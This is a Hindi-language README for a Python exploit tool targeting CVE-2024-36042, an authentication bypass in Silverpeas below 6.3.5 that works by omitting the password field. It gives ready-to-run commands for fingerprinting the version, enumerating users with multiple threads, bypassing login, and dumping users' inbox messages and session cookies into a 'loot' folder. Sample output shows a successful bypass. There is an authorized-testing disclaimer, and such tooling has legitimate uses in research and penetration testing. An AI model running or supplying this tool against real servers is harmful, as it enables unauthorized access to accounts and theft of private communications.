
Silverpeas < 6.3.5 में CVE-2024-36042 प्रमाणीकरण बाईपास के लिए Python PoC। इसमें संस्करण पहचान, मल्टी-थ्रेडेड उपयोगकर्ता गणना, संदेश निष्कर्षण, और अधिकृत सुरक्षा परीक्षण के लिए संरचित रिपोर्टिंग शामिल है।
Silverpeas < 6.3.5 में
AuthenticationServletमें पासवर्ड सत्यापन की कमी के कारण होने वाले CVE-2024-36042 — एक प्रमाणीकरण बाईपास के लिए एक स्वच्छ, पेशेवर-ग्रेड Python3 प्रूफ-ऑफ-कॉन्सेप्ट।
Silverpeas AuthenticationServlet POST बॉडी से Password पैरामीटर हटाए जाने पर भी एक लॉगिन अनुरोध स्वीकार कर लेता है, जिससे किसी भी ज्ञात उपयोगकर्ता नाम को प्रमाणित सत्र पहुँच प्रदान होती है। यह उपकरण एक मॉड्यूलर, थ्रेडेड एक्सप्लॉइट फ्रेमवर्क के माध्यम से उन्नत रिकॉनिसेंस, डेटा निष्कर्षण और पेशेवर रिपोर्ट जनरेशन के साथ इस भेद्यता को जिम्मेदारीपूर्वक प्रदर्शित करता है।
प्रभावित: Silverpeas < 6.3.5
CVE: CVE-2024-36042
GHSA: GHSA-qvh3-8c57-gp4m
git clone https://github.com/YOURNAME/Silverpeas-AuthBypass-CVE-2024-36042.git
cd Silverpeas-AuthBypass-CVE-2024-36042
pip install requests beautifulsoup4
python3 CVE-2024-36042.py -t http://TARGET:8080 --dump-messages
python3 CVE-2024-36042.py -t http://TARGET:8080 -u admin --dump-messages --message-output both
python3 CVE-2024-36042.py -t http://TARGET:8080 --userlist users.txt --dump-messages --message-output files --output-format md --outdir ./loot
python3 CVE-2024-36042.py -t http://TARGET:8080 --check-version --no-exploit
python3 CVE-2024-36042.py -t http://TARGET:8080 --proxy http://127.0.0.1:8080 --dump-messages --save-raw-html
यह उपकरण --message-output के माध्यम से डंप किए गए संदेशों के लिए चार प्रमुख आउटपुट मोड का समर्थन करता है:
console (डिफ़ॉल्ट): कीवर्ड हाइलाइटिंग के साथ साफ किए गए संदेश सीधे टर्मिनल पर प्रिंट करता है।markdown: आउटपुट निर्देशिका में प्रति खाता एक एकल {username}_messages.md रिपोर्ट उत्पन्न करता है।files: प्रति खाता एक फ़ोल्डर बनाता है और प्रत्येक संदेश को एक अलग फ़ाइल के रूप में सहेजता है (जैसे, message_0006.md) फ़ाइल सिस्टम की सफल छँटाई के लिए शून्य-पैडेड आईडी के साथ।both: console और markdown मोड को जोड़ता है।outdir/
├── SilverAdmin/
│ ├── message_0001.md
│ ├── message_0002.md
│ ├── raw/ (वैकल्पिक: --save-raw-html)
│ │ └── msg_1.html
│ └── session_cookies.txt
├── scr1ptkiddy/
│ ├── messages.md
│ └── session_cookies.txt
└── summary.json
-t, --target Silverpeas का बेस URL (अनिवार्य)
-u, --user लक्षित एकल उपयोगकर्ता नाम
--userlist प्रति पंक्ति एक उपयोगकर्ता नाम वाली फ़ाइल
--dump-messages इनबॉक्स संदेशों को स्क्रैप और प्रदर्शित करें
--max-id जाँचने के लिए अधिकतम संदेश आईडी (डिफ़ॉल्ट: 50)
--threads समवर्ती वर्कर्स (डिफ़ॉल्ट: 5)
--proxy HTTP प्रॉक्सी URL
--message-output आउटपुट मोड: {console, markdown, files, both}
--output-format फ़ाइल प्रारूप: {md, txt}
--json पूर्ण JSON रिपोर्ट निर्यात करें
--csv स्क्रैप किए गए संदेशों का CSV निर्यात करें
--outdir निर्यात के लिए आउटपुट निर्देशिका
--no-color ANSI रंग आउटपुट अक्षम करें (लॉग के लिए उपयोगी)
--save-raw-html डीबगिंग के लिए मूल HTML प्रतिक्रियाएँ सहेजें
--check-version केवल संस्करण फिंगरप्रिंट करें
--no-exploit शोषण छोड़ें (--check-version के साथ जोड़ें)
--quiet, -q न्यूनतम आउटपुट
--no-banner बैनर दबाएँ
[*] Target : http://10.49.169.44:8080
[*] Version : 6.3.1
[+] Version 6.3.1 < 6.3.5 - vulnerable.
[*] Trying: scr1ptkiddy
[+] BYPASSED -> scr1ptkiddy
[+] Data saved to ./scr1ptkiddy
────────────────────────────────────────────────────────────────────
Execution Summary
────────────────────────────────────────────────────────────────────
┌───────────────┬──────────┬──────────┐
│ Account │ Status │ Messages │
├───────────────┼──────────┼──────────┤
│ scr1ptkiddy │ SUCCESS │ 6 │
│ admin │ FAILED │ 0 │
└───────────────┴──────────┴──────────┘
[+] JSON report -> ./report_20260516_013210.json
यह रिपॉजिटरी मेरे आक्रामक-सुरक्षा पोर्टफोलियो का हिस्सा है। यह प्रदर्शित करता है:
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण, अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। हमेशा उस बुनियादी ढाँचे का परीक्षण करने से पहले स्पष्ट अनुमति प्राप्त करें जो आपका नहीं है।
MIT
| विशेषता | विवरण |
|---|
| संस्करण पहचान | शोषण से पहले Silverpeas संस्करण और भेद्यता स्थिति का फिंगरप्रिंट लें। |
| बहु-थ्रेडेड | ThreadPoolExecutor के माध्यम से थ्रेड-सुरक्षित आउटपुट के साथ समवर्ती उपयोगकर्ता गणना। |
| उन्नत खोज | बहु-भाषी (अंग्रेज़ी/फ़्रेंच) एंडपॉइंट खोज और बहु-आईडी प्रोबिंग। |
| डेटा निष्कर्षण | डिडुप्लीकेशन और बॉयलरप्लेट फ़िल्टरिंग के साथ उच्च-निष्ठा संदेश डंपिंग। |
| लचीला आउटपुट | कंसोल, मार्कडाउन रिपोर्ट और व्यक्तिगत फ़ाइल निर्यात (.md या .txt) के लिए समर्थन। |
| प्रॉक्सी और डीबगिंग | Burp/ZAP के माध्यम से रूट करें (--proxy) और पार्सर डीबगिंग के लिए कच्चा HTML सहेजें। |
| स्वच्छ UX | ASCII सारांश तालिकाएँ, कीवर्ड हाइलाइटिंग, और वैकल्पिक ANSI रंग नियंत्रण। |